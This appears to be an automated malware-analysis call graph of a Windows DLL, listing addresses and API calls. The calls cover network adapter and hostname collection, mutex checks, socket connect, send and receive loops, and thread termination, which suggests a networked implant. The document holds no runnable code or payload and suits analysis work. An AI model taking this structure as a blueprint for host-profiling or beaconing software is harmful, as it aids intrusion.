__gmtime64_s 31164->31176 31166 100353a9 _strrchr 31166->31005 31168 10034bdf 31167->31168 31174 10034c2c 31167->31174 31177 100416ee 31168->31177 31171 10034c0d 31171->31174 31183 10043487 70 API calls 6 library calls 31171->31183 31174->31166 31175 10037f1f 68 API calls __getptd_noexit 31174->31175 31175->31164 31176->31166 31184 10041706 GetLastError 31177->31184 31179 100416f4 31181 10034be4 31179->31181 31198 1003c87f 68 API calls 3 library calls 31179->31198 31181->31171 31182 10043105 76 API calls 5 library calls 31181->31182 31182->31171 31183->31174 31185 1003937d __CRT_INIT@12 TlsGetValue 31184->31185 31186 1004171b 31185->31186 31187 10041769 SetLastError 31186->31187 31188 10039211 __calloc_crt 65 API calls 31186->31188 31187->31179 31189 1004172e 31188->31189 31189->31187 31199 1003939c TlsSetValue 31189->31199 31191 10041742 31192 10041760 31191->31192 31193 10041748 31191->31193 31195 10033984 _free 65 API calls 31192->31195 31200 10041775 68 API calls 4 library calls 31193->31200 31197 10041766 31195->31197 31196 10041750 GetCurrentThreadId 31196->31187 31197->31187 31199->31191 31200->31196 31201->31010 31202->31018 31203->31021 31204->31023 31206->31030 31207->31031 31215 100364df 31208->31215 31210 100364da 31210->31041 31211->31037 31212->31037 31213->31041 31214->31041 31216 10034bce _LocaleUpdate::_LocaleUpdate 78 API calls 31215->31216 31217 100364f2 31216->31217 31220 10036509 ___from_strstr_to_strchr 31217->31220 31222 10037f1f 68 API calls __getptd_noexit 31217->31222 31219 100364fe 31223 1003b745 9 API calls __gmtime64_s 31219->31223 31220->31210 31222->31219 31223->31220 31225 100360e5 31224->31225 31228 10035eaa 31225->31228 31229 10034bce _LocaleUpdate::_LocaleUpdate 78 API calls 31228->31229 31231 10035ebb 31229->31231 31230 10035ee2 31240 10037f1f 68 API calls __getptd_noexit 31230->31240 31231->31230 31235 10035ef7 31231->31235 31233 10035ee7 31241 1003b745 9 API calls __gmtime64_s 31233->31241 31238 10035f3a 31235->31238 31242 10044f8d 81 API calls 3 library calls 31235->31242 31236 1000deab 31236->31051 31238->31236 31243 10037f1f 68 API calls __getptd_noexit 31238->31243 31240->31233 31241->31236 31242->31235 31243->31236 31245 1001659d ___DllMainCRTStartup 31244->31245 31246 100165a1 31245->31246 31247 100165bf 31245->31247 31251 10016606 69 API calls 2 library calls 31246->31251 31252 10016699 69 API calls ___DllMainCRTStartup 31247->31252 31250 100165bd ___DllMainCRTStartup 31250->30680 31251->31250 31252->31250 31255 10015df2 __EH_prolog 31254->31255 31256 10015e46 31255->31256 31257 10015e05 31255->31257 31258 10015e53 31256->31258 31336 1001610a 69 API calls ___DllMainCRTStartup 31256->31336 31259 10015e21 31257->31259 31334 1001610a 69 API calls ___DllMainCRTStartup 31257->31334 31261 10011849 31258->31261 31337 100169d1 69 API calls 2 library calls 31258->31337 31259->31261 31335 100169d1 69 API calls 2 library calls 31259->31335 31261->30727 31261->30728 31266 10015719 __gmtime64_s __EH_prolog 31265->31266 31267 1001c213 ___DllMainCRTStartup 70 API calls 31266->31267 31268 1001577d 31267->31268 31269 10011419 ___DllMainCRTStartup 72 API calls 31268->31269 31270 1001578e 31269->31270 31271 10032fed _sprintf 104 API calls 31270->31271 31272 100157c6 Mailbox numpunct 31271->31272 31273 10003256 ___DllMainCRTStartup 69 API calls 31272->31273 31274 100157ed 31273->31274 31275 10001898 ___DllMainCRTStartup 104 API calls 31274->31275 31276 10015807 31275->31276 31277 10001d63 numpunct 69 API calls 31276->31277 31278 10015810 31277->31278 31279 100168f4 ___DllMainCRTStartup 69 API calls 31278->31279 31280 10015820 OpenMutexA GetLastError 31279->31280 31281 1001584f 31280->31281 31283 10015911 ___DllMainCRTStartup 31280->31283 31282 10015858 OpenMutexA GetLastError 31281->31282 31281->31283 31282->31283 31284 1001587a 31282->31284 31285 1001593c ReleaseMutex CloseHandle 31283->31285 31284->31283 31286 10015883 CreateMutexA CreateMutexA GetLastError 31284->31286 31288 100158f6 Mailbox ___DllMainCRTStartup 31285->31288 31287 100158be ReleaseMutex CloseHandle ReleaseMutex CloseHandle 31286->31287 31286->31288 31287->31288 31288->30731 31289->30732 31291 10011992 ___DllMainCRTStartup __EH_prolog 31290->31291 31292 10034410 __time64 GetSystemTimeAsFileTime 31291->31292 31293 100119b3 31292->31293 31294 10011419 ___DllMainCRTStartup 72 API calls 31293->31294 31295 100119c7 31294->31295 31338 10011c4e 31295->31338 31297 100119d8 ___DllMainCRTStartup 31393 10009107 31297->31393 31299 100119fd 31300 10001d63 numpunct 69 API calls 31299->31300 31301 10011a0e 31300->31301 31302 10001d63 numpunct 69 API calls 31301->31302 31303 10011a1f 31302->31303 31304 10002d15 ___DllMainCRTStartup 69 API calls 31303->31304 31305 10011a34 31304->31305 31400 1001be7e 31305->31400 31307 10011a42 ___DllMainCRTStartup 31412 1001bf99 31307->31412 31310 10001d63 numpunct 69 API calls 31311 10011aad 31310->31311 31312 10001d63 numpunct 69 API calls 31311->31312 31313 10011ac1 31312->31313 31314 10001d63 numpunct 69 API calls 31313->31314 31315 10011ad5 31314->31315 31316 10001d63 numpunct 69 API calls 31315->31316 31317 10011ae9 31316->31317 31418 1001ba63 31317->31418 31320 1001ba63 ___DllMainCRTStartup 69 API calls 31321 10011b1e 31320->31321 31322 10001d63 numpunct 69 API calls 31321->31322 31323 10011b30 31322->31323 31324 10002d15 ___DllMainCRTStartup 69 API calls 31323->31324 31325 10011b48 31324->31325 31422 1001b9cf 31325->31422 31328 1001b9cf ___DllMainCRTStartup 72 API calls 31329 10011b73 31328->31329 31433 1000236c 31329->31433 31334->31259 31335->31261 31336->31258 31337->31261 31339 10011c58 __EH_prolog 31338->31339 31445 100021eb GetAdaptersInfo 31339->31445 31342 10011ce1 31457 100022f0 gethostname 31342->31457 31345 10011cd3 31456 100022c4 104 API calls ___DllMainCRTStartup 31345->31456 31348 10015fd9 ___DllMainCRTStartup 69 API calls 31349 10011d04 31348->31349 31350 1001bc82 ___DllMainCRTStartup 72 API calls 31349->31350 31351 10011d18 Mailbox ___DllMainCRTStartup 31350->31351 31465 10008f12 31351->31465 31353 10011d49 ___DllMainCRTStartup 31469 10009053 31353->31469 31356 10009053 ___DllMainCRTStartup 69 API calls 31357 10011ddf 31356->31357 31358 10009053 ___DllMainCRTStartup 69 API calls 31357->31358 31359 10011e18 31358->31359 31359->31359 31360 10009053 ___DllMainCRTStartup 69 API calls 31359->31360 31361 10011e54 31360->31361 31361->31361 31362 10009053 ___DllMainCRTStartup 69 API calls 31361->31362 31363 10011e90 31362->31363 31473 10009f0d 31363->31473 31365 10011eb0 31365->31365 31366 10009053 ___DllMainCRTStartup 69 API calls 31365->31366 31367 10011ede 31366->31367 31368 10009f0d ___DllMainCRTStartup 69 API calls 31367->31368 31369 10011efe 31368->31369 31370 10001d63 numpunct 69 API calls 31369->31370 31371 10011f29 31370->31371 31372 10001d63 numpunct 69 API calls 31371->31372 31385 10011f39 31372->31385 31374 1001215c ___DllMainCRTStartup 31483 10009f88 31374->31483 31376 10012199 31548 10008ebb 31376->31548 31379 10001d63 numpunct 69 API calls 31380 100121aa 31379->31380 31382 10033984 _free 68 API calls 31380->31382 31381 10009f0d 69 API calls ___DllMainCRTStartup 31381->31385 31383 100121bc 31382->31383 31384 10033984 _free 68 API calls 31383->31384 31386 100121d1 Mailbox 31384->31386 31385->31381 31388 10009053 69 API calls ___DllMainCRTStartup 31385->31388 31392 10012136 31385->31392 31477 1000a371 69 API calls 2 library calls 31385->31477 31478 100090a4 69 API calls ___DllMainCRTStartup 31385->31478 31552 10008f9c 31386->31552 31388->31385 31389 10012202 Mailbox 31389->31297 31479 10009005 31392->31479 31394 10009116 31393->31394 31395 1000914a 31393->31395 31396 10001f9f ___DllMainCRTStartup 69 API calls 31394->31396 31607 1003248d 69 API calls 2 library calls 31395->31607 31398 1000911e ___DllMainCRTStartup 31396->31398 31398->31299 31401 1001be88 __gmtime64_s __EH_prolog 31400->31401 31402 10032fed _sprintf 104 API calls 31401->31402 31403 1001befd 31402->31403 31404 10001898 ___DllMainCRTStartup 104 API calls 31403->31404 31405 1001bf0c 31404->31405 31406 10001d63 numpunct 69 API calls 31405->31406 31407 1001bf15 numpunct 31406->31407 31408 10001f26 numpunct 69 API calls 31407->31408 31409 1001bf63 numpunct 31408->31409 31410 10001f26 numpunct 69 API calls 31409->31410 31411 1001bf7a Mailbox 31410->31411 31411->31307 31413 1001bfa3 __EH_prolog 31412->31413 31608 10002ebf 31413->31608 31415 1001bfe7 ___DllMainCRTStartup 31416 10001db3 numpunct 69 API calls 31415->31416 31417 10011a99 31416->31417 31417->31310 31419 1001ba81 ___DllMainCRTStartup 31418->31419 31420 10011b05 31419->31420 31613 100032f8 69 API calls 3 library calls 31419->31613 31420->31320 31423 1001b9d9 __EH_prolog 31422->31423 31424 10015fd9 ___DllMainCRTStartup 69 API calls 31423->31424 31425 1001b9f8 31424->31425 31426 10011b5f 31425->31426 31427 1001ba0c LocalAlloc 31425->31427 31426->31328 31427->31426 31428 1001ba22 MultiByteToWideChar 31427->31428 31430 1001ba41 char_traits 31428->31430 31431 1001658d ___DllMainCRTStartup 69 API calls 31430->31431 31432 1001ba4b LocalFree 31431->31432 31432->31426 31434 10002376 __gmtime64_s __chsize_nolock __EH_prolog 31433->31434 31435 1001bc82 ___DllMainCRTStartup 72 API calls 31434->31435 31436 100023b6 31435->31436 31437 1001bc82 ___DllMainCRTStartup 72 API calls 31436->31437 31438 100023c7 31437->31438 31439 10032fed _sprintf 104 API calls 31438->31439 31440 100023f9 Mailbox 31439->31440 31441 10001d63 numpunct 69 API calls 31440->31441 31442 10002426 31441->31442 31614 1000246e 31442->31614 31446 1000221b GlobalAlloc 31445->31446 31447 1000220f 31445->31447 31448 10002214 31446->31448 31449 10002231 GetAdaptersInfo 31446->31449 31447->31446 31447->31448 31448->31342 31455 100022c4 104 API calls ___DllMainCRTStartup 31448->31455 31450 100022b6 GlobalFree 31449->31450 31451 1000223c 31449->31451 31450->31448 31452 10002270 31451->31452 31453 1000225c inet_addr 31451->31453 31452->31450 31453->31451 31454 10002272 inet_addr SendARP 31453->31454 31454->31450 31455->31345 31456->31342 31458 10002316 31457->31458 31459 1000231a numpunct 31457->31459 31458->31348 31460 10001f26 numpunct 69 API calls 31459->31460 31461 10002336 gethostbyname 31460->31461 31461->31458 31462 10002347 inet_ntoa 31461->31462 31463 1000235c numpunct 31462->31463 31464 10001f26 numpunct 69 API calls 31463->31464 31464->31458 31466 10008f1c __EH_prolog 31465->31466 31467 10033888 std::_Facet_Register 69 API calls 31466->31467 31468 10008f69 31466->31468 31467->31468 31468->31353 31470 1000905d __EH_prolog 31469->31470 31471 10009005 ___DllMainCRTStartup 69 API calls 31470->31471 31472 10009095 31471->31472 31472->31356 31474 10009f17 __EH_prolog 31473->31474 31558 10009461 31474->31558 31477->31385 31478->31385 31480 1000900f __EH_prolog 31479->31480 31481 10009461 ___DllMainCRTStartup 69 API calls 31480->31481 31482 10009044 31481->31482 31482->31374 31484 1000a362 31483->31484 31485 10009fa8 31483->31485 31601 1000a4eb 72 API calls ___DllMainCRTStartup 31484->31601 31487 1000a2f9 31485->31487 31488 10009faf 31485->31488 31599 1000a65b 72 API calls ___DllMainCRTStartup 31487->31599 31489 10009fb6 31488->31489 31490 1000a2ae 31488->31490 31494 1000a1e5 31489->31494 31495 10009fbd 31489->31495 31597 1000a65b 72 API calls ___DllMainCRTStartup 31490->31597 31492 1000a304 31542 1000a013 ___DllMainCRTStartup 31492->31542 31600 1000a811 72 API calls 2 library calls 31492->31600 31591 1000a65b 72 API calls ___DllMainCRTStartup 31494->31591 31498 10009fc4 31495->31498 31499 1000a169 31495->31499 31496 1000a2b9 31496->31542 31598 1000a811 72 API calls 2 library calls 31496->31598 31503 10009fcb 31498->31503 31516 1000a13b ___DllMainCRTStartup 31498->31516 31588 1000a65b 72 API calls ___DllMainCRTStartup 31499->31588 31502 1000a1f0 31508 1000a209 31502->31508 31592 1000ab28 72 API calls 2 library calls 31502->31592 31504 10009fd4 31503->31504 31505 1000a035 31503->31505 31576 1000a65b 72 API calls ___DllMainCRTStartup 31504->31576 31510 1000a07b 31505->31510 31511 1000a03e 31505->31511 31506 1000a174 31512 1000a18a 31506->31512 31589 1000ab28 72 API calls 2 library calls 31506->31589 31593 1000a69a 72 API calls ___DllMainCRTStartup 31508->31593 31517 1000a084 31510->31517 31518 1000a0ac 31510->31518 31578 1000a65b 72 API calls ___DllMainCRTStartup 31511->31578 31590 1000a69a 72 API calls ___DllMainCRTStartup 31512->31590 31515 10009fe8 31515->31542 31577 10008e92 72 API calls ___DllMainCRTStartup 31515->31577 31586 1000a65b 72 API calls ___DllMainCRTStartup 31516->31586 31580 1000a65b 72 API calls ___DllMainCRTStartup 31517->31580 31525 1000a104 31518->31525 31526 1000a0b5 31518->31526 31524 1000a04b 31579 10008e92 72 API calls ___DllMainCRTStartup 31524->31579 31584 1000a65b 72 API calls ___DllMainCRTStartup 31525->31584 31582 1000a65b 72 API calls ___DllMainCRTStartup 31526->31582 31527 1000a1d5 31596 1000a69a 72 API calls ___DllMainCRTStartup 31527->31596 31529 1000a15a 31587 1000a55f 72 API calls ___DllMainCRTStartup 31529->31587 31530 1000a091 31581 10008e92 72 API calls ___DllMainCRTStartup 31530->31581 31534 1000a0c4 31583 10008e92 72 API calls ___DllMainCRTStartup 31534->31583 31537 1000a116 31585 10008e92 72 API calls ___DllMainCRTStartup 31537->31585 31541 10009f88 ___DllMainCRTStartup 72 API calls 31543 1000a1a8 31541->31543 31542->31376 31543->31527 31543->31541 31543->31542 31546 1000a226 ___DllMainCRTStartup 31546->31527 31546->31542 31547 10009f88 ___DllMainCRTStartup 72 API calls 31546->31547 31594 1000a65b 72 API calls ___DllMainCRTStartup 31546->31594 31595 1000a55f 72 API calls ___DllMainCRTStartup 31546->31595 31547->31546 31549 10008ec7 31548->31549 31550 10008ece 31548->31550 31602 1000a811 72 API calls 2 library calls 31549->31602 31550->31379 31553 10008fa6 31552->31553 31554 10008fac 31552->31554 31603 100094e7 31553->31603 31556 10033984 _free 68 API calls 31554->31556 31557 10008fb4 31556->31557 31557->31389 31559 10009470 31558->31559 31560 10009488 31558->31560 31561 10009474 31559->31561 31562 1000948a 31559->31562 31560->31365 31565 10009c01 31561->31565 31569 10009c4e 69 API calls 2 library calls 31562->31569 31566 10009c0f 31565->31566 31567 10009c13 31565->31567 31566->31560 31567->31566 31570 10009e53 31567->31570 31569->31560 31571 10009e60 31570->31571 31572 10009e67 31570->31572 31574 10033888 std::_Facet_Register 69 API calls 31571->31574 31573 10009e89 31572->31573 31575 100339bc _malloc 68 API calls 31572->31575 31573->31566 31574->31572 31575->31573 31576->31515 31577->31542 31578->31524 31579->31542 31580->31530 31581->31542 31582->31534 31583->31542 31584->31537 31585->31542 31586->31529 31587->31542 31588->31506 31589->31512 31590->31543 31591->31502 31592->31508 31593->31546 31594->31546 31595->31546 31596->31542 31597->31496 31598->31542 31599->31492 31600->31542 31601->31542 31602->31550 31605 10009508 31603->31605 31606 100094ef 31603->31606 31604 10033984 _free 68 API calls 31604->31606 31605->31554 31606->31604 31606->31605 31609 10002eca 31608->31609 31610 10002edb 31608->31610 31609->31415 31612 10002fd7 69 API calls ___DllMainCRTStartup 31610->31612 31612->31609 31613->31419 31615 10002478 __EH_prolog 31614->31615 31696 1001a146 31615->31696 31618 10001d63 numpunct 69 API calls 31619 100024a6 31618->31619 31699 1001a61c 31619->31699 31621 100024b6 Mailbox 31622 10001e92 numpunct 69 API calls 31621->31622 31623 100024e1 31622->31623 31705 1001a65f 31623->31705 31625 100024f4 Mailbox 31626 10001d63 numpunct 69 API calls 31625->31626 31627 1000250c 31626->31627 31628 10033afd ___DllMainCRTStartup 81 API calls 31627->31628 31629 10002526 ___DllMainCRTStartup 31628->31629 31711 1001a0f8 31629->31711 31719 1001a36c 31629->31719 31630 10002555 31631 100028e2 WSAGetLastError 31630->31631 31632 10002563 31630->31632 31634 1001a6bd ___DllMainCRTStartup 69 API calls 31631->31634 31740 1001a6bd 31632->31740 31641 100028b8 Mailbox ___DllMainCRTStartup 31634->31641 31635 10002575 numpunct 31636 10003256 ___DllMainCRTStartup 69 API calls 31635->31636 31637 10002595 numpunct 31636->31637 31638 10003256 ___DllMainCRTStartup 69 API calls 31637->31638 31639 100025b1 31638->31639 31640 1001a6bd ___DllMainCRTStartup 69 API calls 31639->31640 31642 100025bd 31640->31642 31794 10017a55 31641->31794 31644 10002f31 ___DllMainCRTStartup 69 API calls 31642->31644 31645 100025d1 Mailbox 31644->31645 31743 1001a6a2 31645->31743 31646 10002941 Mailbox ___DllMainCRTStartup 31798 1001a1ac 31646->31798 31650 10002f31 ___DllMainCRTStartup 69 API calls 31652 100025fd Mailbox numpunct 31650->31652 31653 10003256 ___DllMainCRTStartup 69 API calls 31652->31653 31654 10002625 numpunct 31653->31654 31655 10003256 ___DllMainCRTStartup 69 API calls 31654->31655 31656 10002641 31655->31656 31657 10001d63 numpunct 69 API calls 31656->31657 31658 1000264d 31657->31658 31746 10003078 31658->31746 31662 1000267e 31663 10001d63 numpunct 69 API calls 31662->31663 31664 10002691 31663->31664 31757 10017a82 31664->31757 31666 100026a0 Mailbox 31667 10001d63 numpunct 69 API calls 31666->31667 31668 100026be 31667->31668 31669 10001d63 numpunct 69 API calls 31668->31669 31670 100026d1 31669->31670 31671 10017a82 ___DllMainCRTStartup 107 API calls 31670->31671 31672 100026e0 31671->31672 31673 10001d63 numpunct 69 API calls 31672->31673 31674 100026f2 31673->31674 31675 10001d63 numpunct 69 API calls 31674->31675 31676 10002705 31675->31676 31677 10017a82 ___DllMainCRTStartup 107 API calls 31676->31677 31678 10002714 31677->31678 31769 10017c93 31678->31769 31684 10002753 31685 10002778 ___DllMainCRTStartup numpunct 31684->31685 31686 10017bf7 ___DllMainCRTStartup 110 API calls 31684->31686 31687 10001f26 numpunct 69 API calls 31685->31687 31686->31684 31693 100027a6 Mailbox ___DllMainCRTStartup 31687->31693 31688 10002e39 69 API calls ___DllMainCRTStartup 31688->31693 31689 10001db3 69 API calls numpunct 31689->31693 31691 10001e92 69 API calls numpunct 31691->31693 31692 10002f31 ___DllMainCRTStartup 69 API calls 31692->31693 31693->31641 31693->31688 31693->31689 31693->31691 31693->31692 31793 100338d7 68 API calls _vscan_fn 31693->31793 31697 100339bc _malloc 68 API calls 31696->31697 31698 10002496 31697->31698 31698->31618 31700 1001a62c 31699->31700 31703 1001a645 31699->31703 31802 100359ab 106 API calls 8 library calls 31700->31802 31702 1001a659 31702->31621 31703->31702 31704 10001e92 numpunct 69 API calls 31703->31704 31704->31702 31706 1001a688 31705->31706 31707 1001a66f 31705->31707 31708 1001a69c 31706->31708 31710 10001e92 numpunct 69 API calls 31706->31710 31803 100359ab 106 API calls 8 library calls 31707->31803 31708->31625 31710->31708 31712 1001a118 inet_addr 31711->31712 31713 1001a0ff 31711->31713 31715 1001a130 gethostbyname 31712->31715 31716 1001a129 31712->31716 31804 100359ab 106 API calls 8 library calls 31713->31804 31718 1001a13b 31715->31718 31716->31630 31717 1001a115 31717->31712 31718->31630 31720 1001a396 31719->31720 31737 1001a3f9 Mailbox 31719->31737 31721 1001a0f8 108 API calls 31720->31721 31722 1001a3a8 31721->31722 31723 1001a3b0 htons socket 31722->31723 31722->31737 31724 1001a3f0 WSAGetLastError 31723->31724 31725 1001a40d setsockopt 31723->31725 31724->31737 31726 1001a430 inet_ntoa 31725->31726 31727 10001d63 numpunct 69 API calls 31726->31727 31738 1001a444 Mailbox ___DllMainCRTStartup 31727->31738 31729 10001e92 numpunct 69 API calls 31729->31738 31730 1001a49d connect 31730->31737 31730->31738 31731 1001a5a4 inet_addr 31731->31738 31733 1001a5bc inet_addr 31733->31738 31734 1001a5d4 inet_addr 31734->31738 31735 1001a508 inet_addr 31807 10016d1b 126 API calls 4 library calls 31735->31807 31737->31630 31738->31726 31738->31729 31738->31730 31738->31731 31738->31733 31738->31734 31738->31735 31738->31737 31739 1001a56f inet_addr 31738->31739 31805 100359ab 106 API calls 8 library calls 31738->31805 31806 10016caa 73 API calls 31738->31806 31739->31738 31741 10002d15 ___DllMainCRTStartup 69 API calls 31740->31741 31742 1001a6d1 31741->31742 31742->31635 31744 10002d15 ___DllMainCRTStartup 69 API calls 31743->31744 31745 100025e9 31744->31745 31745->31650 31747 10003082 __EH_prolog numpunct 31746->31747 31748 10003137 ___DllMainCRTStartup 69 API calls 31747->31748 31749 100030bd 31748->31749 31750 10002f31 ___DllMainCRTStartup 69 API calls 31749->31750 31751 100030c8 numpunct 31750->31751 31752 10003256 ___DllMainCRTStartup 69 API calls 31751->31752 31753 10002664 31752->31753 31754 100030ed 31753->31754 31755 10002f31 ___DllMainCRTStartup 69 API calls 31754->31755 31756 10003106 ___DllMainCRTStartup 31755->31756 31756->31662 31758 10017a8c __EH_prolog 31757->31758 31759 10017ab9 31758->31759 31808 100359ab 106 API calls 8 library calls 31758->31808 31761 10002f31 ___DllMainCRTStartup 69 API calls 31759->31761 31762 10017acb numpunct 31761->31762 31763 10003256 ___DllMainCRTStartup 69 API calls 31762->31763 31764 10017ae0 31763->31764 31765 10002f31 ___DllMainCRTStartup 69 API calls 31764->31765 31766 10017aef numpunct 31765->31766 31767 10003256 ___DllMainCRTStartup 69 API calls 31766->31767 31768 10017b04 Mailbox 31767->31768 31768->31666 31770 10017ca3 31769->31770 31771 10017cbc 31769->31771 31809 100359ab 106 API calls 8 library calls 31770->31809 31773 10002f31 ___DllMainCRTStartup 69 API calls 31771->31773 31774 10002723 31773->31774 31775 10017cd2 31774->31775 31776 10017ce2 31775->31776 31777 10017cf7 31775->31777 31810 100359ab 106 API calls 8 library calls 31776->31810 31811 10017b26 31777->31811 31780 10017d03 31782 10017d1c ___DllMainCRTStartup 31780->31782 31827 100359ab 106 API calls 8 library calls 31780->31827 31828 1001a313 31782->31828 31785 10017bf7 31786 10017c09 31785->31786 31788 10017c22 31785->31788 31882 100359ab 106 API calls 8 library calls 31786->31882 31790 10017c3d ___DllMainCRTStartup numpunct 31788->31790 31792 10017c74 Mailbox ___DllMainCRTStartup 31788->31792 31883 1001a1e1 31788->31883 31790->31792 31899 10002e39 69 API calls numpunct 31790->31899 31792->31684 31793->31693 31795 10017a5f closesocket 31794->31795 31796 10017a7a 31794->31796 31795->31796 31797 10017a6d WSAGetLastError 31795->31797 31796->31646 31797->31646 31799 1001a1c3 Mailbox 31798->31799 31800 1001a1bb 31798->31800 31801 10033984 _free 68 API calls 31800->31801 31801->31799 31802->31703 31803->31706 31804->31717 31805->31738 31806->31738 31807->31738 31808->31759 31809->31771 31810->31777 31812 10017b30 __EH_prolog 31811->31812 31835 10018235 31812->31835 31819 10001d63 numpunct 69 API calls 31820 10017b81 31819->31820 31821 10017a82 ___DllMainCRTStartup 107 API calls 31820->31821 31822 10017b8c numpunct 31821->31822 31823 10003256 ___DllMainCRTStartup 69 API calls 31822->31823 31824 10017ba1 31823->31824 31825 1001a313 ___DllMainCRTStartup 108 API calls 31824->31825 31826 10017baa std::ios_base::_Ios_base_dtor ___DllMainCRTStartup 31825->31826 31826->31780 31827->31782 31829 1001a323 31828->31829 31830 1001a339 send 31828->31830 31881 100359ab 106 API calls 8 library calls 31829->31881 31833 1000272e 31830->31833 31834 1001a35b WSAGetLastError 31830->31834 31833->31785 31834->31833 31836 1001823f __EH_prolog 31835->31836 31856 10018a47 31836->31856 31839 10033888 std::_Facet_Register 69 API calls 31840 100182bb 31839->31840 31841 10017b48 31840->31841 31866 1003274c 76 API calls 6 library calls 31840->31866 31843 10017d97 31841->31843 31844 10017da1 __EH_prolog 31843->31844 31867 10018bd8 31844->31867 31846 10017e76 31873 10018c40 31846->31873 31849 10017dba ___DllMainCRTStartup 31849->31846 31871 10019d89 122 API calls 8 library calls 31849->31871 31851 10017de0 std::ios_base::_Ios_base_dtor 31851->31846 31872 10017f3b 69 API calls ___DllMainCRTStartup 31851->31872 31853 1001837c 31877 10018b46 31853->31877 31855 10017b6e 31855->31819 31857 10018a51 __EH_prolog 31856->31857 31858 10033888 std::_Facet_Register 69 API calls 31857->31858 31859 10018a88 31858->31859 31860 1003274c std::locale::_Init 76 API calls 31859->31860 31861 10018a96 ___DllMainCRTStartup 31859->31861 31860->31861 31862 10019ce5 ___DllMainCRTStartup 122 API calls 31861->31862 31863 10018abd std::ios_base::_Ios_base_dtor 31862->31863 31864 1001828f 31863->31864 31865 1001791f ___DllMainCRTStartup 69 API calls 31863->31865 31864->31839 31865->31864 31866->31841 31868 10018be2 __EH_prolog 31867->31868 31869 10018c1e 31868->31869 31870 10017e91 ___DllMainCRTStartup 69 API calls 31868->31870 31869->31849 31870->31869 31871->31851 31872->31846 31874 10018c48 31873->31874 31875 10017b5a 31874->31875 31876 100193fd ___DllMainCRTStartup 69 API calls 31874->31876 31875->31853 31876->31875 31878 10018b5c 31877->31878 31879 10001f26 numpunct 69 API calls 31878->31879 31880 10018b88 Mailbox ___DllMainCRTStartup 31878->31880 31879->31880 31880->31855 31881->31830 31882->31788 31884 1001a1eb __EH_prolog 31883->31884 31885 1001a1fe recv 31884->31885 31893 1001a23e 31884->31893 31886 1001a243 31885->31886 31887 1001a21f WSAGetLastError 31885->31887 31888 10001d63 numpunct 69 API calls 31886->31888 31889 1001a233 numpunct 31887->31889 31890 1001a24e 31888->31890 31892 10001f26 numpunct 69 API calls 31889->31892 31891 10001e92 numpunct 69 API calls 31890->31891 31898 1001a270 Mailbox ___DllMainCRTStartup 31891->31898 31892->31893 31893->31790 31894 1001a2e4 recv 31894->31893 31894->31898 31895 10001d63 numpunct 69 API calls 31895->31898 31896 10001e92 numpunct 69 API calls 31896->31898 31897 10002f31 ___DllMainCRTStartup 69 API calls 31897->31898 31898->31894 31898->31895 31898->31896 31898->31897 31899->31792 31902 1001e1c2 31901->31902 31903 1001e1ba closesocket 31901->31903 31904 1001e1c6 closesocket 31902->31904 31905 1001e1cc 31902->31905 31903->31902 31904->31905 31906 1001e1d1 closesocket 31905->31906 31907 1001e1d9 31905->31907 31906->31907 31908 1001e205 31907->31908 31909 1001e1ec Sleep TerminateThread CloseHandle 31907->31909 31910 1001e223 31908->31910 31911 1001e20a Sleep TerminateThread CloseHandle 31908->31911 31909->31908 31912 1001e241 31910->31912 31913 1001e228 Sleep TerminateThread CloseHandle 31910->31913 31911->31910 31914 1001e246 Sleep TerminateThread CloseHandle 31912->31914 31915 1001e25f Sleep 31912->31915 31913->31912 31914->31915 31915->30737 31916->30738 31918 1000e824 31917->31918 31919 1000e815 ReleaseMutex CloseHandle 31917->31919 31930 1000e7a5 31918->31930 31919->31918 31922 1000e847 TerminateThread CloseHandle 31923 1000e85b 31922->31923 31924 1000e865 TerminateThread CloseHandle 31923->31924 31925 1000e879 31923->31925 31924->31925 31926 1000e883 TerminateThread CloseHandle 31925->31926 31927 1000e897 31925->31927 31926->31927 31928 100074e8 31927->31928 31934 10015d17 68 API calls Mailbox 31927->31934 31928->30741 31928->30742 31932 1000e7b6 31930->31932 31931 1000e7ee Sleep 31931->31922 31931->31923 31932->31931 31935 1000bffa 112 API calls 3 library calls 31932->31935 31934->31927 31935->31931 31945 10005be6 WSAStartup 31936->31945 31938 1001a92a 31939 1001a93d 31938->31939 31940 1001a92c Sleep 31938->31940 31941 10007486 ___DllMainCRTStartup 143 API calls 31939->31941 31940->31938 31942 1001a944 31941->31942 31943 1001a984 Sleep 31942->31943 31944 1001a94d ReleaseMutex CloseHandle ReleaseMutex CloseHandle 31942->31944 31944->31943 31946 10005c24 Mailbox 31945->31946 31947 10005c2b __gmtime64_s 31945->31947 31946->31938 31999 1001544f 31947->31999 31950 10011419 ___DllMainCRTStartup 72 API calls 31951 10005c6d 31950->31951 32012 10009ec5 31951->32012 31953 10005c84 Mailbox 31954 10005c97 CreateMutexA 31953->31954 31955 1001c213 ___DllMainCRTStartup 70 API calls 31954->31955 31956 10005cdb 31955->31956 31957 10032fed _sprintf 104 API calls 31956->31957 31958 10005d19 31957->31958 31959 10003078 ___DllMainCRTStartup 69 API calls 31958->31959 31960 10005d2b 31959->31960 31961 10002f31 ___DllMainCRTStartup 69 API calls 31960->31961 31962 10005d43 Mailbox 31961->31962 31963 10001898 ___DllMainCRTStartup 104 API calls 31962->31963 31964 10005d61 31963->31964 31965 10001d63 numpunct 69 API calls 31964->31965 31966 10005d6e CreateMutexA 31965->31966 31967 10005dab __gmtime64_s 31966->31967 31968 1001c213 ___DllMainCRTStartup 70 API calls 31967->31968 31969 10005db7 31968->31969 31970 10032fed _sprintf 104 API calls 31969->31970 31971 10005de5 31970->31971 31972 10003078 ___DllMainCRTStartup 69 API calls 31971->31972 31973 10005df7 31972->31973 31974 10002f31 ___DllMainCRTStartup 69 API calls 31973->31974 31975 10005e0f Mailbox 31974->31975 31976 10001898 ___DllMainCRTStartup 104 API calls 31975->31976 31977 10005e2d 31976->31977 31978 10001d63 numpunct 69 API calls 31977->31978 31979 10005e3a CreateMutexA 31978->31979 31980 10005e76 __gmtime64_s 31979->31980 31981 1001c213 ___DllMainCRTStartup 70 API calls 31980->31981 31982 10005e85 31981->31982 31983 10032fed _sprintf 104 API calls 31982->31983 31984 10005eb3 31983->31984 31985 10003078 ___DllMainCRTStartup 69 API calls 31984->31985 31986 10005ec5 31985->31986 31987 10002f31 ___DllMainCRTStartup 69 API calls 31986->31987 31988 10005ee0 Mailbox 31987->31988 31989 10001898 ___DllMainCRTStartup 104 API calls 31988->31989 31990 10005efe 31989->31990 31991 10001d63 numpunct 69 API calls 31990->31991 31992 10005f0b CreateMutexA CreateThread CreateThread 31991->31992 31993 10005fad __gmtime64_s 31992->31993 32497 100056f0 31992->32497 32506 10005697 31992->32506 